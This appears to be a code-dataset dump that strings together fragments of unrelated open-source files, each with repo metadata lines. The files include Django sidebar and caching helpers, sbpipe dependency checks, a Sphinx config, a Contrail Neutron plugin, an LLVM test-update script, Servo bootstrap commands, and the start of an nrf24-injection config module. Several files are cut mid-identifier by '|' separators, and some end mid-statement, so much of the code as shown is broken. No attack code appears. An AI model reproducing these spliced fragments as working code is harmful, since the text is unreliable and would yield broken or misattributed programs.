# to avoid having to do 2 queries, make a combined one
# set it up with an iterator
for page in StaticPage.objects.filter(sidebar_urls_q):
if page.url.startswith('sidebar_top_'):
data['sidebar_top'] = page
elif page.url.startswith('sidebar_bottom_'):
data['sidebar_bottom'] = page
return data
# Make this context processor return a closure so it's explicit
# from the template if you need its data.
return {'get_sidebar': get_sidebar}
def get_upcoming_events(channels, user,
length=settings.UPCOMING_SIDEBAR_COUNT):
"""return a queryset of upcoming events"""
anonymous = True
contributor = False
if user.is_active:
anonymous = False
if is_contributor(user):
contributor = True
cache_key = 'upcoming_events_%s_%s' % (int(anonymous), int(contributor))
cache_key += ','.join(str(x.id) for x in channels)
event = most_recent_event()
if event:
cache_key += str(event.modified.microsecond)
upcoming = cache.get(cache_key)
if upcoming is None:
upcoming = _get_upcoming_events(channels, anonymous, contributor)
upcoming = upcoming[:length]
cache.set(cache_key, upcoming, 60 * 60)
return upcoming
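# Illustrative cache key produced by the scheme above (hypothetical values):
#   'upcoming_events_1_0' + '3,7' + '421337' == 'upcoming_events_1_03,7421337'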
def _get_upcoming_events(channels, anonymous, contributor):
"""do the heavy lifting of getting the featured events"""
upcoming = Event.objects.upcoming().order_by('start_time')
upcoming = upcoming.filter(channels__in=channels).distinct()
upcoming = upcoming.select_related('picture')
if anonymous:
upcoming = upcoming.exclude(privacy=Event.PRIVACY_COMPANY)
elif contributor:
upcoming = upcoming.filter(privacy=Event.PRIVACY_PUBLIC)
return upcoming
def get_featured_events(
channels,
user,
length=settings.FEATURED_SIDEBAR_COUNT
):
"""return a list of events that are sorted by their score"""
anonymous = True
contributor = False
if user.is_active:
anonymous = False
if is_contributor(user):
contributor = True
cache_key = 'featured_events_%s_%s' % (int(anonymous), int(contributor))
if channels:
cache_key += ','.join(str(x.id) for x in channels)
event = most_recent_event()
if event:
cache_key += str(event.modified.microsecond)
featured = cache.get(cache_key)
if featured is None:
featured = _get_featured_events(channels, anonymous, contributor)
featured = featured[:length]
cache.set(cache_key, featured, 60 * 60)
# Sadly, in Django when you do a left outer join on a many-to-many
# table you get repeats and you can't fix that by adding a simple
# `distinct` on the first field.
    # In Django, if you do `myqueryset.distinct('id')` it requires that
    # 'id' is also something you order by.
# In pure Postgresql you can do this:
# SELECT
# DISTINCT main_eventhitstats.id as id,
# (some formula) AS score,
# ...
# FROM ...
# INNER JOIN ...
# INNER JOIN ...
# ORDER BY score DESC
# LIMIT 5;
#
# But you can't do that with Django.
# So we have to manually de-dupe. Hopefully we can alleviate this
# problem altogether when we start doing aggregates where you have
# many repeated EventHitStats *per* event and you need to look at
# their total score across multiple vidly shortcodes.
events = []
for each in featured:
if each.event not in events:
events.append(each.event)
r
|
pdp10/sbpipe
|
sbpipe/utils/dependencies.py
|
Python
|
mit
| 3,141
| 0.001273
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Piero Dalle Pezze
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import subprocess
import logging
logger = logging.getLogger('sbpipe')
def which(cmd_name):
"""
Utility equivalent to `which` in GNU/Linux OS.
:param cmd_name: a command name
    :return: the command name with absolute path if it exists, or None
"""
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, cmd_n
|
ame)):
return os.path.join(path, cmd_name)
if os.path.exists(os.path.join(path, cmd_name + '.exe')):
return os.path.join(path, cmd_name + '.exe')
return None
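# Illustrative behaviour (results depend on the host PATH):
#
#   >>> which('ls')
#   '/usr/bin/ls'
#   >>> which('no-such-command') is None
#   True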
def is_py_package_installed(package):
"""
Utility checking whether a Python package is i
|
nstalled.
:param package: a Python package name
:return: True if it is installed, false otherwise.
"""
try:
installed_packages = subprocess.Popen(['pip', 'list'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
if package in str(installed_packages):
return True
return False
except OSError as e:
logger.warning("pip is not installed")
return False
def is_r_package_installed(package):
"""
Utility checking whether a R package is installed.
:param package: an R package name
:return: True if it is installed, false otherwise.
"""
try:
output = subprocess.Popen(['Rscript',
os.path.join(os.path.dirname(__file__), os.pardir, "is_package_installed.r"),
package],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()[0]
logger.debug("is sbpiper installed? " + str(output))
if "TRUE" in str(output):
return True
return False
except OSError as e:
logger.error("R is not installed")
return False
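# Ad-hoc demo of the helpers above (hypothetical package names; run this
# module directly to probe the local toolchain):
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    print('Rscript found at: {0}'.format(which('Rscript')))
    print('Python package "numpy" installed: {0}'.format(is_py_package_installed('numpy')))
    print('R package "sbpiper" installed: {0}'.format(is_r_package_installed('sbpiper')))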
|
ulfaslak/bandicoot
|
immutable/docs/conf.py
|
Python
|
mit
| 8,601
| 0.005813
|
# -*- coding: utf-8 -*-
#
# bandicoot documentation build configuration file, created by
# sphinx-quickstart on Mon Apr 28 20:51:43 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import mozilla_sphinx_theme
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, '..')
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'sphinx.ext.autosummary',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = False
napoleon_numpy_docstring = True
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bandicoot'
copyright = u'2014-2015, Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.4'
# The full version, including alpha/beta/rc tags.
release = '0.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "mozilla"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [os.path.dirname(mozilla_sphinx_theme.__file__)]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_f
|
avicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin st
|
atic files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bandicootdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bandicoot.tex', u'bandicoot Documentation',
u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bandicoot', u'bandicoot Documentation',
[u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bandicoot', u'bandicoot Documentation',
u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'bandicoo
|
cloudwatt/contrail-neutron-plugin
|
neutron_plugin_contrail/plugins/opencontrail/contrail_plugin.py
|
Python
|
apache-2.0
| 28,349
| 0.000106
|
# Copyright 2014 Juniper Networks. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Hampapur Ajay, Praneet Bachheti, Rudra Rugge, Atul Moghe
from oslo.config import cfg
import requests
from neutron.api.v2 import attributes as attr
from neutron.common import exceptions as exc
from neutron.db import portbindings_base
from neutron.db import quota_db # noqa
from neutron.extensions import external_net
from neutron.extensions import portbindings
from neutron.extensions import securitygroup
from neutron import neutron_plugin_base_v2
from neutron.openstack.common import importutils
from neutron.openstack.common import jsonutils as json
from neutron.openstack.common import log as logging
from simplejson import JSONDecodeError
LOG = logging.getLogger(__name__)
vnc_opts = [
cfg.StrOpt('api_server_ip', default='127.0.0.1',
help='IP address to connect to VNC controller'),
cfg.StrOpt('api_server_port', default='8082',
help='Port to connect to VNC controller'),
cfg.DictOpt('contrail_extensions', default={},
help='Enable Contrail extensions(policy, ipam)'),
]
# ContrailError message have translated already.
# so there is no need to use i18n here.
class ContrailNotFoundError(exc.NotFound):
message = '%(msg)s'
class ContrailConflictError(exc.Conflict):
message = '%(msg)s'
class ContrailBadRequestError(exc.BadRequest):
message = '%(msg)s'
class ContrailServiceUnavailableError(exc.ServiceUnavailable):
message = '%(msg)s'
class ContrailNotAuthorizedError(exc.NotAuthorized):
message = '%(msg)s'
class InvalidContrailExtensionError(exc.ServiceUnavailable):
message = _("Invalid Contrail Extension: %(ext_name) %(ext_class)")
CONTRAIL_EXCEPTION_MAP = {
requests.codes.not_found: ContrailNotFoundError,
requests.codes.conflict: ContrailConflictError,
requests.codes.bad_request: ContrailBadRequestError,
requests.codes.service_unavailable: ContrailServiceUnavailableError,
requests.codes.unauthorized: ContrailNotAuthorizedError,
requests.codes.request_timeout: ContrailServiceUnavailableError,
}
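# Hypothetical sketch of how the map above can translate a failed relay call
# (sketch only; the exact handling lives elsewhere in the plugin):
#
#   if response.status_code in CONTRAIL_EXCEPTION_MAP:
#       raise CONTRAIL_EXCEPTION_MAP[response.status_code](msg=response.content)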
class NeutronPluginContrailCoreV2(neutron_plugin_base_v2.NeutronPluginBaseV2,
securitygroup.SecurityGroupPluginBase,
|
portbindings_base.PortBindingBaseMixin,
external_net.External_net):
supported_extension_aliases = ["security-group", "router",
"port-security", "binding", "agent",
"quotas", "external-net",
"allowed-address-pairs", "extra_dhcp_opt"]
PLUGIN_URL_PREFIX = '/neutron'
__native_bulk_support = False
# patch
|
VIF_TYPES
portbindings.__dict__['VIF_TYPE_VROUTER'] = 'vrouter'
portbindings.VIF_TYPES.append(portbindings.VIF_TYPE_VROUTER)
def _parse_class_args(self):
"""Parse the contrailplugin.ini file.
        OpenContrail supports extensions such as ipam and policy; these
        extensions can be configured in the plugin configuration file as shown
        below. The plugin then loads the specified extensions.
contrail_extensions=ipam:<classpath>,policy:<classpath>
"""
contrail_extensions = cfg.CONF.APISERVER.contrail_extensions
# If multiple class specified for same extension, last one will win
# according to DictOpt behavior
for ext_name, ext_class in contrail_extensions.items():
try:
if not ext_class:
LOG.error(_('Malformed contrail extension...'))
continue
self.supported_extension_aliases.append(ext_name)
ext_class = importutils.import_class(ext_class)
ext_instance = ext_class()
ext_instance.set_core(self)
for method in dir(ext_instance):
for prefix in ['get', 'update', 'delete', 'create']:
if method.startswith('%s_' % prefix):
setattr(self, method,
ext_instance.__getattribute__(method))
except Exception:
LOG.exception(_("Contrail Backend Error"))
# Converting contrail backend error to Neutron Exception
raise InvalidContrailExtensionError(
ext_name=ext_name, ext_class=ext_class)
#keystone
self._authn_token = None
if cfg.CONF.auth_strategy == 'keystone':
kcfg = cfg.CONF.keystone_authtoken
body = '{"auth":{"passwordCredentials":{'
body += ' "username": "%s",' % (kcfg.admin_user)
body += ' "password": "%s"},' % (kcfg.admin_password)
body += ' "tenantName":"%s"}}' % (kcfg.admin_tenant_name)
self._authn_body = body
self._authn_token = cfg.CONF.keystone_authtoken.admin_token
self._keystone_url = "%s://%s:%s%s" % (
cfg.CONF.keystone_authtoken.auth_protocol,
cfg.CONF.keystone_authtoken.auth_host,
cfg.CONF.keystone_authtoken.auth_port,
"/v2.0/tokens")
def __init__(self):
super(NeutronPluginContrailCoreV2, self).__init__()
portbindings_base.register_port_dict_function()
cfg.CONF.register_opts(vnc_opts, 'APISERVER')
self._parse_class_args()
def _get_base_binding_dict(self):
binding = {
portbindings.VIF_TYPE: portbindings.VIF_TYPE_VROUTER,
portbindings.VIF_DETAILS: {
# TODO(praneetb): Replace with new VIF security details
portbindings.CAP_PORT_FILTER:
'security-group' in self.supported_extension_aliases
}
}
return binding
def get_agents(self, context, filters=None, fields=None):
# This method is implemented so that horizon is happy
return []
def _request_api_server(self, url, data=None, headers=None):
# Attempt to post to Api-Server
response = requests.post(url, data=data, headers=headers)
if (response.status_code == requests.codes.unauthorized):
# Get token from keystone and save it for next request
response = requests.post(self._keystone_url,
data=self._authn_body,
headers={'Content-type': 'application/json'})
if (response.status_code == requests.codes.ok):
# plan is to re-issue original request with new token
auth_headers = headers or {}
authn_content = json.loads(response.text)
self._authn_token = authn_content['access']['token']['id']
auth_headers['X-AUTH-TOKEN'] = self._authn_token
response = self._request_api_server(url, data, auth_headers)
else:
raise RuntimeError('Authentication Failure')
return response
def _request_api_server_authn(self, url, data=None, headers=None):
authn_headers = headers or {}
if self._authn_token is not None:
authn_headers['X-AUTH-TOKEN'] = self._authn_token
response = self._request_api_server(url, data, headers=authn_headers)
return response
def _relay_request(self, url_path, data=None):
"""Send received request to api server."""
url = "http://%s:%s%s" % (cfg.CONF.APISERVER.api_server_ip,
cfg.CONF.APISERVER.api_server_port,
url_path)
|
google/llvm-propeller
|
llvm/utils/update_analyze_test_checks.py
|
Python
|
apache-2.0
| 6,940
| 0.010519
|
#!/usr/bin/env python3
"""A script to generate FileCheck statements for 'opt' analysis tests.
This script is a utility to update LLVM opt analysis test cases with new
FileCheck patterns. It can either update all of the tests in the file or
a single test function.
Example usage:
$ update_analyze_test_checks.py --opt=../bin/opt test/foo.ll
Workflow:
1. Make a compiler patch that requires updating some number of FileCheck lines
in regression test files.
2. Save the patch and revert it from your local work area.
3. Update the RUN-lines in the affected regression tests to look canonical.
Example: "; RUN: opt < %s -analyze -cost-model -S | FileCheck %s"
4. Refresh the FileCheck lines for either the entire file or select functions by
running this script.
5. Commit the fresh baseline of checks.
6. Apply your patch from step 1 and rebuild your local binaries.
7. Re-run this script on affected regression tests.
8. Check the diffs to ensure the script has done something reasonable.
9. Submit a patch including the regression test diffs for review.
A common pattern is to have the script insert complete checking of every
instruction. Then, edit it down to only check the relevant instructions.
The script is designed to make adding checks to a test case fast; it is *not*
designed to be authoritative about what constitutes a good test!
"""
from __future__ import print_function
import argparse
import glob
import itertools
import os # Used to advertise this file's name ("autogenerated_note").
import string
import subprocess
import sys
import tempfile
import re
from UpdateTestChecks import common
ADVERT = '; NOTE: Assertions have been autogenerated by '
def main():
from argparse import RawTextHelpFormatter
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument('--opt-binary', default='opt',
help='The opt binary used to generate the test case')
parser.add_argument(
'--function', help='The function in the test file to update')
parser.add_argument('tests', nargs='+')
args = common.parse_commandline_args(parser)
script_name = os.path.basename(__file__)
autogenerated_note = (ADVERT + 'utils/' + script_name)
opt_basename = os.path.basename(args.opt_binary)
if (opt_basename != "opt"):
common.error('Unexpected opt name: ' + opt_basename)
sys.exit(1)
test_paths = [test for pattern in args.tests for test in glob.glob(pattern)]
for test in test_paths:
with open(test) as f:
input_lines = [l.rstrip() for l in f]
first_line = input_lines[0] if input_lines else ""
if 'autogenerated' in first_line and script_name not in first_line:
common.warn("Skipping test which wasn't autogenerated by " + script_name + ": " + test)
continue
if args.update_only:
if not first_line or 'autogenerated' not in first_line:
common.warn("Skipping test which isn't autogenerated: " + test)
continue
run_lines = common.find_run_lines(test, input_lines)
prefix_list = []
for l in run_lines:
if '|' not in l:
common.warn('Skipping unparseable RUN line: ' + l)
continue
(tool_cmd, filecheck_cmd) = tuple([cmd.strip() for cmd in l.split('|', 1)])
common.verify_filecheck_prefixes(filecheck_cmd)
if not tool_cmd.startswith(opt_basename + ' '):
        common.warn('Skipping non-%s RUN line: %s' % (opt_basename, l))
continue
if not filecheck_cmd.startswith('FileCheck '):
common.warn('Skipping non-FileChecked RUN line: ' + l)
continue
tool_cmd_args = tool_cmd[len(opt_basename):].strip()
tool_cmd_args = tool_cmd_args.replace('< %s', '').replace('%s', '').strip()
check_prefixes = [item for m in common.CHECK_PREFIX_RE.finditer(filecheck_cmd)
for item in m.group(1).split(',')]
if not check_prefixes:
check_prefixes = ['CHECK']
# FIXME: We should use multiple check prefixes to common check lines. For
# now, we just ignore all but the last.
prefix_list.append((check_prefixes, tool_cmd_args))
func_dict = {}
for prefixes, _ in prefix_list:
for prefix in prefixes:
func_dict.update({prefix: dict()})
for prefixes, opt_args in prefix_list:
common.debug('Extracted opt cmd:', opt_basename, opt_args, file=sys.stderr)
common.debug('Extracted FileCheck prefixes:', str(prefixes), file=sys.stderr)
raw_tool_outputs = common.invoke_tool(args.opt_binary, opt_args, test)
# Split analysis outputs by "Printing analysis " declarations.
for raw_tool_output in re.split(r'Printing analysis ', raw_tool_outputs):
common.build_function_body_dictionary(
common.ANALYZE_FUNCTION_RE, c
|
ommon.scrub_body, [],
raw_tool_output, prefixes, func_dict, args.verbose, False, False)
is_in_function = False
is_in_function_start = False
prefix_set = set([prefix for prefixes, _ in prefix_list for prefix in prefixes])
common.debug('Rewriting FileCheck prefixes:', str(prefix_set), file=sys.stderr)
output_lines = []
output_lines.append(autogenerated_note)
for input_line in input_lines:
if is_in_function_start:
|
if input_line == '':
continue
if input_line.lstrip().startswith(';'):
m = common.CHECK_RE.match(input_line)
if not m or m.group(1) not in prefix_set:
output_lines.append(input_line)
continue
# Print out the various check lines here.
common.add_analyze_checks(output_lines, ';', prefix_list, func_dict, func_name)
is_in_function_start = False
if is_in_function:
if common.should_add_line_to_output(input_line, prefix_set):
# This input line of the function body will go as-is into the output.
# Except make leading whitespace uniform: 2 spaces.
input_line = common.SCRUB_LEADING_WHITESPACE_RE.sub(r' ', input_line)
output_lines.append(input_line)
else:
continue
if input_line.strip() == '}':
is_in_function = False
continue
# Discard any previous script advertising.
if input_line.startswith(ADVERT):
continue
# If it's outside a function, it just gets copied to the output.
output_lines.append(input_line)
m = common.IR_FUNCTION_RE.match(input_line)
if not m:
continue
func_name = m.group(1)
if args.function is not None and func_name != args.function:
# When filtering on a specific function, skip all others.
continue
is_in_function = is_in_function_start = True
common.debug('Writing %d lines to %s...' % (len(output_lines), test))
with open(test, 'wb') as f:
f.writelines(['{}\n'.format(l).encode('utf-8') for l in output_lines])
if __name__ == '__main__':
main()
|
bheesham/servo
|
python/servo/bootstrap_commands.py
|
Python
|
mpl-2.0
| 12,893
| 0.002094
|
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
from __future__ import print_function, unicode_literals
import base64
import json
import os
import os.path as path
import re
import shutil
import subprocess
import sys
import StringIO
import tarfile
import urllib2
from distutils.version import LooseVersion
from mach.decorators import (
CommandArgument,
CommandProvider,
Command,
)
from servo.command_base import CommandBase, cd, host_triple, check_call, BIN_SUFFIX
def download(desc, src, writer):
print("Downloading %s..." % desc)
dumb = (os.environ.get("TERM") == "dumb") or (not sys.stdout.isatty())
try:
resp = urllib2.urlopen(src)
fsize = None
if resp.info().getheader('Content-Length'):
fsize = int(resp.info().getheader('Content-Length').strip())
recved = 0
chunk_size = 8192
while True:
chunk = resp.read(chunk_size)
if not chunk:
break
recved += len(chunk)
if not dumb:
if fsize is not None:
pct = recved * 100.0 / fsize
print("\rDownloading %s: %5.1f%%" % (desc, pct), end="")
sys.stdout.flush()
writer.write(chunk)
if not dumb:
print()
except urllib2.HTTPError, e:
print("Download failed (%d): %s - %s" % (e.code, e.reason, src))
sys.exit(1)
def download_file(desc, src, dst):
with open(dst, 'wb') as fd:
download(desc, src, fd)
def download_bytes(desc, src):
content_writer = StringIO.StringIO()
download(desc, src, content_writer)
return content_writer.getvalue()
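# Usage sketch of the helpers above (hypothetical URLs and paths):
#
#   download_file("Rust compiler", "https://example.com/rustc.tar.gz",
#                 "/tmp/rustc.tar.gz")
#   manifest = download_bytes("manifest", "https://example.com/manifest.json")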
def extract(src, dst, movedir=None):
tarfile.open(src).extractall(dst)
if movedir:
for f in os.listdir(movedir):
frm = path.join(movedir, f)
to = path.join(dst, f)
os.rename(frm, to)
os.rmdir(movedir)
os.remove(src)
@CommandProvider
class MachCommands(CommandBase):
@Command('env',
description='Print environment setup commands',
category='bootstrap')
def env(self):
env = self.build_env()
print("export PATH=%s" % env["PATH"])
if sys.platform == "darwin":
print("export DYLD_LIBRARY_PATH=%s" % env["DYLD_LIBRARY_PATH"])
else:
print("export LD_LIBRARY_PATH=%s" % env["LD_LIBRARY_PATH"])
@Command('bootstrap-rust',
description='Download the Rust compiler',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if a copy already exists')
def bootstrap_rustc(self, force=False):
rust_dir = path.join(
self.context.sharedir, "rust", self.rust_path())
if not force and path.exists(path.join(rust_dir, "rustc", "bin", "rustc" + BIN_SUFFIX)):
print("Rust compiler already downloaded.", end=" ")
print("Use |bootstrap-rust --force| to download again.")
return
if path.isdir(rust_dir):
shutil.rmtree(rust_dir)
os.makedirs(rust_dir)
date = self.rust_path().split("/")[0]
install_dir = path.join(self.context.sharedir, "rust", date)
# The Rust compiler is hosted on the nightly server under the date with a name
# rustc-nightly-HOST-TRIPLE.tar.gz. We just need to pull down and extract it,
# giving a directory name that will be the same as the tarball name (rustc is
# in that directory).
rustc_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s.tar.gz"
% self.rust_path())
tgz_file = rust_dir + '-rustc.tar.gz'
download_file("Rust compiler", rustc_url, tgz_file)
print("Extracting Rust compiler...")
extract(tgz_file, install_dir)
# Each Rust stdlib has a name of the form `rust-std-nightly-TRIPLE.tar.gz`, with
# a directory of the name `rust-std-TRIPLE` inside and then a `lib` directory.
# This `lib` directory needs to be extracted and merged with the `rustc/lib`
# directory from the host compiler above.
# TODO: make it possible to request an additional cross-target to add to this
# list.
stdlibs = [host_triple(), "arm-linux-androideabi"]
for target in stdlibs:
std_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s/rust-std-nightly-%s.tar.gz"
% (date, target))
tgz_file = install_dir + ('rust-std-nightly-%s.tar.gz' % target)
download_file("Host rust library for target %s" % target, std_url, tgz_file)
print("Extracting Rust stdlib for target %s..." % target)
extract(tgz_file, install_dir)
shutil.copytree(path.join(install_dir, "rust-std-nightly-%s" % target,
"rust-std-%s" % target, "lib", "rustlib", target),
path.join(install_dir, "rustc-nightly-%s" % host_triple(),
"rustc", "lib", "rustlib", target))
shutil.rmtree(path.join(install_dir, "rust-std-nightly-%s" % target))
print("Rust ready.")
@Command('bootstrap-rust-docs',
description='Download the Rust documentation',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if docs already exist')
def bootstrap_rustc_docs(self, force=False):
self.ensure_bootstrapped()
rust_root = self.config["tools"]["rust-root"]
docs_dir = path.join(rust_root, "doc")
if not force and path.
|
exists(docs_dir):
print("Rust docs already downloaded.", end=" ")
print("Use |bootstrap-rust-docs --force| to download again.")
ret
|
urn
if path.isdir(docs_dir):
shutil.rmtree(docs_dir)
docs_name = self.rust_path().replace("rustc-", "rust-docs-")
docs_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/rust-docs-nightly-%s.tar.gz"
% host_triple())
tgz_file = path.join(rust_root, 'doc.tar.gz')
download_file("Rust docs", docs_url, tgz_file)
print("Extracting Rust docs...")
temp_dir = path.join(rust_root, "temp_docs")
if path.isdir(temp_dir):
shutil.rmtree(temp_dir)
extract(tgz_file, temp_dir)
shutil.move(path.join(temp_dir, docs_name.split("/")[1],
"rust-docs", "share", "doc", "rust", "html"),
docs_dir)
shutil.rmtree(temp_dir)
print("Rust docs ready.")
@Command('bootstrap-cargo',
description='Download the Cargo build tool',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if cargo already exists')
def bootstrap_cargo(self, force=False):
cargo_dir = path.join(self.context.sharedir, "cargo",
self.cargo_build_id())
if not force and path.exists(path.join(cargo_dir, "cargo", "bin", "cargo" + BIN_SUFFIX)):
print("Cargo already downloaded.", end=" ")
print("Use |bootstrap-cargo --force| to download again.")
return
if path.isdir(cargo_dir):
shutil.rmtree(cargo_dir)
os.makedirs(cargo_dir)
tgz_file = "cargo-nightly-%s.tar.gz" % host_triple()
nightly_url = "https://static-rust-lang-org.s3.amazonaws.com/cargo-dist/%s/%s" % \
(self.cargo_build_id(), tgz_file)
download_file("Cargo nightly",
|
xswxm/nrf24-injection
|
utils/config.py
|
Python
|
gpl-3.0
| 8,406
| 0.022365
|
#!/usr/bin/env python2
'''
Author: xswxm
Blog: xswxm.com
This script will analyze the payloads/tasks assigned by messager.py
and output the result to display.py.
It also stores most parameters, which are shared between different classes and scripts.
'''
import sys
sys.path.append("..")
from array import array
from utils import display
from utils.device import *
from lib import common
command = ''
devices = []
deviceID = None
menu = []
channel_time = None
strict_match = None
# Add a new device to the devices
def add_device(address, channel, payload):
from player import Player
def redo_scan(channel):
if Player.feature_ping < Player.last_ping:
global channel_time
# Pause Player correctly
